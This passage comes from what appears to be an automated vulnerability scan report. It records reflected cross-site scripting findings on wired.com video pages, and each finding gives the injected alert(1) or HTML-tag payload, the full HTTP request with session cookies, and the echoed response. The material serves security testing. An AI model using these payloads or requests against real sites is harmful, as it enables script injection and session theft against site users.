CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "653193147001","latest-videos","latest","1815816633","tron-legacy-clip-quorra-saves-sam9277e"-alert(1)-"0623ce045a","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1242. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff16"-alert(1)-"ae3d5100f07 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/6531931470014ff16"-alert(1)-"ae3d5100f07 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:50:06 GMT
Date: Mon, 22 Nov 2010 00:45:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","tron-legacy-clip-quorra-saves-sam","latest","1815816633","video","6531931470014ff16"-alert(1)-"ae3d5100f07"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1243. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e7f"><a>a8a93c134d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videod0e7f"><a>a8a93c134d1/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29426
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:39:32 GMT
Date: Mon, 22 Nov 2010 00:34:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videod0e7f"><a>a8a93c134d1 ss_latest-videos c_latest">
...[SNIP]...

1.1244. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 42deb--><script>alert(1)</script>ae5daa4176f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video42deb--><script>alert(1)</script>ae5daa4176f/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29465
Vary: Accept-Encoding
Cache-Control: max-age=272
Expires: Mon, 22 Nov 2010 00:40:28 GMT
Date: Mon, 22 Nov 2010 00:35:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video42deb--><script>alert(1)</script>ae5daa4176f/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001
-->
...[SNIP]...

1.1245. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4da85"-alert(1)-"6a6abf3762a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos4da85"-alert(1)-"6a6abf3762a/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:32 GMT
Date: Mon, 22 Nov 2010 00:36:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "wearable-computers-for-soldiers","latest","1815816633","660701101001","latest-videos4da85"-alert(1)-"6a6abf3762a","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1246. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8948d"><a>bc9e08a046d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos8948d"><a>bc9e08a046d/latest/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:40:58 GMT
Date: Mon, 22 Nov 2010 00:35:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos8948d"><a>bc9e08a046d c_latest">
...[SNIP]...

1.1247. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ccc"-alert(1)-"4125b11533d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest43ccc"-alert(1)-"4125b11533d/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:32 GMT
Date: Mon, 22 Nov 2010 00:37:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106779


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "wearable-computers-for-soldiers","latest43ccc"-alert(1)-"4125b11533d","latest-videos","1815816633","660701101001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1248. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b69"><a>216cf93e556 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest63b69"><a>216cf93e556/1815816633/wearable-computers-for-soldiers/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:38 GMT
Date: Mon, 22 Nov 2010 00:36:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest63b69"><a>216cf93e556">
...[SNIP]...

1.1249. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462c0"-alert(1)-"79cf4379b85 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633462c0"-alert(1)-"79cf4379b85/wearable-computers-for-soldiers/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:42:50 GMT
Date: Mon, 22 Nov 2010 00:37:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106751


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "wearable-computers-for-soldiers","latest-videos","latest","660701101001","1815816633462c0"-alert(1)-"79cf4379b85","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1250. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaac9"-alert(1)-"b17cb971a9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/wearable-computers-for-soldierseaac9"-alert(1)-"b17cb971a9/660701101001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=285
Expires: Mon, 22 Nov 2010 00:42:49 GMT
Date: Mon, 22 Nov 2010 00:38:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106757


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "wearable-computers-for-soldierseaac9"-alert(1)-"b17cb971a9","latest-videos","latest","1815816633","660701101001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1251. http://www.wired.com/video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba772"-alert(1)-"71ceb5bac16 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/wearable-computers-for-soldiers/660701101001ba772"-alert(1)-"71ceb5bac16 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=297
Expires: Mon, 22 Nov 2010 00:43:13 GMT
Date: Mon, 22 Nov 2010 00:38:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "wearable-computers-for-soldiers","latest-videos","latest","1815816633","660701101001ba772"-alert(1)-"71ceb5bac16","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1252. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f261d"><a>7a7c8bf4dcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videof261d"><a>7a7c8bf4dcb/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29472
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:58:31 GMT
Date: Mon, 22 Nov 2010 00:53:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videof261d"><a>7a7c8bf4dcb ss_making-the-soundtrack-harry-potter-and-the-deathly-hallows c_653378922001">
...[SNIP]...

1.1253. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6728f--><script>alert(1)</script>9c8c6ac13b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video6728f--><script>alert(1)</script>9c8c6ac13b3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29505
Vary: Accept-Encoding
Cache-Control: max-age=280
Expires: Mon, 22 Nov 2010 00:58:56 GMT
Date: Mon, 22 Nov 2010 00:54:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video6728f--><script>alert(1)</script>9c8c6ac13b3/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001
-->
...[SNIP]...

1.1254. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62e15"-alert(1)-"0a8696b2140 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows62e15"-alert(1)-"0a8696b2140/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=298
Expires: Mon, 22 Nov 2010 01:00:19 GMT
Date: Mon, 22 Nov 2010 00:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "making-the-soundtrack-harry-potter-and-the-deathly-hallows62e15"-alert(1)-"0a8696b2140","653378922001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1255. http://www.wired.com/video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows/653378922001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44987"><a>042fad4950 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/making-the-soundtrack-harry-potter-and-the-deathly-hallows44987"><a>042fad4950/653378922001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
